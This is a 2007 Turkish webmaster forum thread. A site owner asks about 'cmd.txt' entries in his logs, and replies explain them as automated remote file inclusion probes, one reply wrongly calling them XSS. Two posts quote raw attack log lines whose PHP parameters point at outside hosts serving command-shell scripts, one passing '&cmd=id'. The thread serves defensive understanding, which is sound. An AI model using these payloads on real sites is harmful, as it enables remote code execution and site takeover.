• 20-09-2007, 21:43:53
    #1
    arkadaşlar siteme yapılan saldırılar sonrası kayıtlara bakıyordum ve neredeyse her 3 saldırıdan 2 sinde bu yazı karşıma çıkıyor "cmd.txt" ne oluyor bu?
  • 20-09-2007, 21:45:41
    #2
    Üyeliği durduruldu
    sanırım injection saldırısı. site adı vs. varmıydı?
  • 20-09-2007, 22:57:05
    #3
    sanırım site adı dedigin benimki degil saldırı kayıtlarında bu dosyanın bulundugu bisürü site adresi vardı,birazdan bakar,bikaç örnek eklerim
  • 21-09-2007, 04:32:20
    #4
    Bu tür loglardan bahsediyorsan, bende bundan milyonlarca var, shell atma girişimleri, sanırım bunun bot'u var, çünkü bazen farklı betiklere ait saldırılar oluyor ve 404 ile geri gidiyor.


    http://www.site.com/phpbb/include/falan.php?phpbb_root_path=http://www.xxx.com/cmd.txt
  • 21-09-2007, 13:01:01
    #5
    /index.php?c=http://pucorp.t5.com.br/cmd.txt??
    /viewtopic.php?t=http://www.jungo8949.co.kr/tool25.txt?&cmd=id
    /search.php?cutepath=http://baixinho.orgfree.com/cmd2.txt??
    /viewtopic.php?p=http://www.angelfire.com/wh0r3z/cmd.txt?
    /login.php?redirect=http://www.pastelariaoteca.com/components/com_jpack/cmd.txt?

    işte bagzı örnekler....
  • 21-09-2007, 18:29:31
    #6
    Bir önceki iletimde yazdığım gibi, rastgele XSS arama/atma çabaları bunlar.
  • 21-09-2007, 18:34:52
    #7
    2 sitemde de görünce bunları biraz garibime gitti.bi sitemde ct,digerinde phpbb security kurulu.şu ana kadar bi sorun yok ama en azından ne oldugunu sorayım dedim,teşekkürler
  • 27-10-2007, 20:55:09
    #8
    Üyeliği durduruldu
    Injection deil Remote File İnclude
    ya bakıyorum çok eski ama hâlâ bir sürü sitede var bu açıklar
  • 27-10-2007, 21:30:32
    #9
    Bu konuya konu olan açık değil, sanki programlı bir bot gibi öncden belirlenen çeşitli yazılımların açıkları rastgele deneniyor hissi veriyor.

    phpBB de nuke açığı ve dosyası aramak gibi. Bilinçli bir saldırgan bunu yapmaz, bu da loglarımıza giren saldırıların bot olduğu izlenimi uyandırıyor.